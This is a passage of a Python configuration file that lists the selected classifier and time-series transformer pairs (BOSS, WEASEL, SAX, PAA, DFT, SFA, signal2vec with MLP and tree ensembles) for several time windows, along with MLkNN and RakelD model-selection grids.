TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=50, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=10, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=20, n_sax_symbols=50, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=20, n_sax_symbols=10, supports_approximation=True)
]
}
}
# Best (classifier, transformer) pairs per representation for an 8-hour
# window: CLF_MODELS[i] was evaluated together with TRANSFORMER_MODELS[i].
# Fix: five occurrences of hidden_layer_sizes=(2000) — a parenthesized int,
# not a tuple — are now (2000,), matching the (1000,)/(100,) style used
# elsewhere.  sklearn wraps a scalar internally, so behavior is unchanged.
selected_models_8h = {
    BOSS: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
                                               norm_std=False),
            TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
                                               norm_std=False),
            TransformerFactory.build_pyts_boss(word_size=4, n_bins=10, window_size=10, norm_mean=False,
                                               norm_std=False),
            TransformerFactory.build_pyts_boss(word_size=4, n_bins=10, window_size=10, norm_mean=False,
                                               norm_std=False)
        ]
    },
    SIGNAL2VEC: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=50),
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=1),
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=5)
        ]
    },
    WEASEL: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam', activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(100, 100), learning_rate='adaptive', solver='adam')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False)
        ]
    },
    PAA: {
        CLF_MODELS: [
            ExtraTreesClassifier(n_jobs=-1, n_estimators=1000),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=500),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=200)
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True)
        ]
    },
    DFT: {
        CLF_MODELS: [
            ExtraTreesClassifier(n_jobs=-1, n_estimators=500),
            RandomForestClassifier(n_jobs=-1, n_estimators=100),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=100),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=2000)
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True),
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True),
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True),
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True)
        ]
    },
    SFA: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(100, 50, 100, 50), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False)
        ]
    },
    SAX1D: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(100, 50, 100, 50), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(100, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=20)
        ]
    },
    SAX: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=100, supports_approximation=False),
            TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=10, supports_approximation=False),
            TransformerFactory.build_tslearn_sax(n_paa_segments=10, n_sax_symbols=20, supports_approximation=False),
            TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=20, supports_approximation=True)
        ]
    }
}
# Best (classifier, transformer) pairs per representation for a 1-hour
# window: CLF_MODELS[i] was evaluated together with TRANSFORMER_MODELS[i].
# Fix: two occurrences of hidden_layer_sizes=(2000) — a parenthesized int,
# not a tuple — are now (2000,).  sklearn wraps a scalar internally, so
# behavior is unchanged.
selected_models_1h = {
    BOSS: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_boss(word_size=4, n_bins=20, window_size=10, norm_mean=False,
                                               norm_std=False),
            TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
                                               norm_std=False),
            TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
                                               norm_std=False),
            TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
                                               norm_std=False)
        ]
    },
    SIGNAL2VEC: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=2),
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=1)
        ]
    },
    WEASEL: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam', activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(100, 50, 100, 50), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam', activation='logistic')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False)
        ]
    },
    PAA: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam'),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=100),
            MLPClassifier(hidden_layer_sizes=(100, 50, 100, 50), learning_rate='adaptive', solver='adam')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True)
        ]
    },
    DFT: {
        CLF_MODELS: [
            ExtraTreesClassifier(n_jobs=-1, n_estimators=100),
            RandomForestClassifier(n_jobs=-1, n_estimators=100),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=500),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=1000)
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True),
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True),
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True),
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True)
        ]
    },
    SFA: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(1000, 2000, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False)
        ]
    },
    SAX1D: {
        CLF_MODELS: [
            ExtraTreesClassifier(n_jobs=-1, n_estimators=100),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=200),
            RandomForestClassifier(n_jobs=-1, n_estimators=100),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=200)
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=50),
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=50)
        ]
    },
    SAX: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_sax(n_paa_segments=20, n_sax_symbols=10, supports_approximation=True),
            TransformerFactory.build_tslearn_sax(n_paa_segments=20, n_sax_symbols=50, supports_approximation=True),
            TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=10, supports_approximation=True),
            TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=50, supports_approximation=True)
        ]
    }
}
# Best (classifier, transformer) pairs per representation for a 2-hour
# window: CLF_MODELS[i] was evaluated together with TRANSFORMER_MODELS[i].
# Fix: four occurrences of hidden_layer_sizes=(2000) — a parenthesized int,
# not a tuple — are now (2000,).  sklearn wraps a scalar internally, so
# behavior is unchanged.
selected_models_2h = {
    BOSS: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(1000, 2000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam', activation='logistic')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
                                               norm_std=False),
            TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
                                               norm_std=False),
            TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
                                               norm_std=False),
            TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
                                               norm_std=False)
        ]
    },
    SIGNAL2VEC: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam', activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=5)
        ]
    },
    WEASEL: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam', activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(100, 50, 100, 50), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam', activation='logistic')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False)
        ]
    },
    PAA: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(100, 50, 100, 50), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam', activation='logistic')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True)
        ]
    },
    DFT: {
        # NOTE(review): classifier list is empty while four transformers are
        # configured — looks like the DFT classifiers were never filled in for
        # the 2h window; confirm against the experiment runner's expectations.
        CLF_MODELS: [
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True),
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True),
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True),
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True)
        ]
    },
    SFA: {
        CLF_MODELS: [
            ExtraTreesClassifier(n_jobs=-1, n_estimators=500),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
            RandomForestClassifier(n_jobs=-1, n_estimators=100),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=1000)
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False)
        ]
    },
    SAX1D: {
        CLF_MODELS: [
            ExtraTreesClassifier(n_jobs=-1, n_estimators=1000),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
            RandomForestClassifier(n_jobs=-1, n_estimators=100)
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=20),
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=20)
        ]
    },
    SAX: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=50, supports_approximation=True),
            TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=10, supports_approximation=True),
            TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=50, supports_approximation=True),
            TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=50, supports_approximation=True)
        ]
    }
}
# Best (classifier, transformer) pairs per representation for a 24-hour
# window: CLF_MODELS[i] was evaluated together with TRANSFORMER_MODELS[i].
# Fix: eight occurrences of hidden_layer_sizes=(2000) — a parenthesized int,
# not a tuple — are now (2000,).  sklearn wraps a scalar internally, so
# behavior is unchanged.
selected_models_24h = {
    BOSS: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam', activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_boss(word_size=4, n_bins=5, window_size=10, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_boss(word_size=4, n_bins=5, window_size=10, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_boss(word_size=4, n_bins=10, window_size=10, norm_mean=False,
                                               norm_std=False),
            TransformerFactory.build_pyts_boss(word_size=4, n_bins=5, window_size=10, norm_mean=False, norm_std=False)
        ]
    },
    SIGNAL2VEC: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=5),
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=2)
        ]
    },
    WEASEL: {
        # NOTE(review): intentionally(?) empty — no WEASEL configuration was
        # selected for the 24h window; confirm downstream code tolerates the
        # empty lists.
        CLF_MODELS: [
        ],
        TRANSFORMER_MODELS: [
        ]
    },
    PAA: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam', activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
                          activation='logistic')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True)
        ]
    },
    DFT: {
        CLF_MODELS: [
            ExtraTreesClassifier(n_jobs=-1, n_estimators=100),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=500),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=200)
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True),
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True),
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True),
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True)
        ]
    },
    SFA: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam'),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=1000),
            RandomForestClassifier(n_jobs=-1, n_estimators=200),
            ExtraTreesClassifier(n_jobs=-1, n_estimators=100)
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False)
        ]
    },
    SAX1D: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam', activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam', activation='logistic'),
            MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=20),
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=50),
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=100)
        ]
    },
    SAX: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(100, 100), learning_rate='adaptive', solver='adam'),
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=10, supports_approximation=True),
            TransformerFactory.build_tslearn_sax(n_paa_segments=20, n_sax_symbols=50, supports_approximation=True),
            TransformerFactory.build_tslearn_sax(n_paa_segments=20, n_sax_symbols=10, supports_approximation=True),
            TransformerFactory.build_tslearn_sax(n_paa_segments=20, n_sax_symbols=50, supports_approximation=True)
        ]
    }
}
# Candidate MLP classifiers swept during model selection.
# Fix: hidden_layer_sizes=(2000) was a parenthesized int, not a tuple; the
# intended single 2000-unit hidden layer is now written (2000,).  sklearn
# wraps a scalar internally, so behavior is unchanged.
model_selection_clf_list = [
    MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam',
                  activation='logistic'),
    MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
                  activation='logistic'),
    MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam',
                  activation='logistic')
]
# Candidate feature transformers explored during model selection.
# TransformerFactory and the SAVED_MODEL / PATH_SIGNAL2VEC constants are
# project code defined elsewhere — presumably a pre-trained signal2vec
# embedding; TODO confirm what TransformerType.transform selects.
model_selection_transformers = [
TransformerFactory.build_pyts_boss(word_size=2, n_bins=5, window_size=10, norm_mean=False, norm_std=False),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=2),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=1),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, transformer_type=TransformerType.transform)
]
# MLkNN hyper-parameter grid: every smoothing value `s` paired with every
# neighbour count `k`. `s` varies slowest so the expansion order matches the
# original hand-written listing (all k for s=1.0, then s=0.5, then s=0.7).
model_selection_mlknn = [
    MLkNN(k=k, s=s, ignore_first_neighbours=0)
    for s in (1.0, 0.5, 0.7)
    for k in (1, 3, 10, 20)
]
# RakelD (random disjoint label-space partitioning) candidates for model
# selection: MLP base classifiers with and without an explicit labelset_size,
# plus GaussianNB baselines over dense input.
# Fix: `hidden_layer_sizes=(2000)` is the int 2000, not a one-element tuple;
# use `(2000,)` — the documented tuple form, consistent with the rest of
# this file (sklearn tolerates a bare int, but the tuple is unambiguous).
model_selection_rakel = [
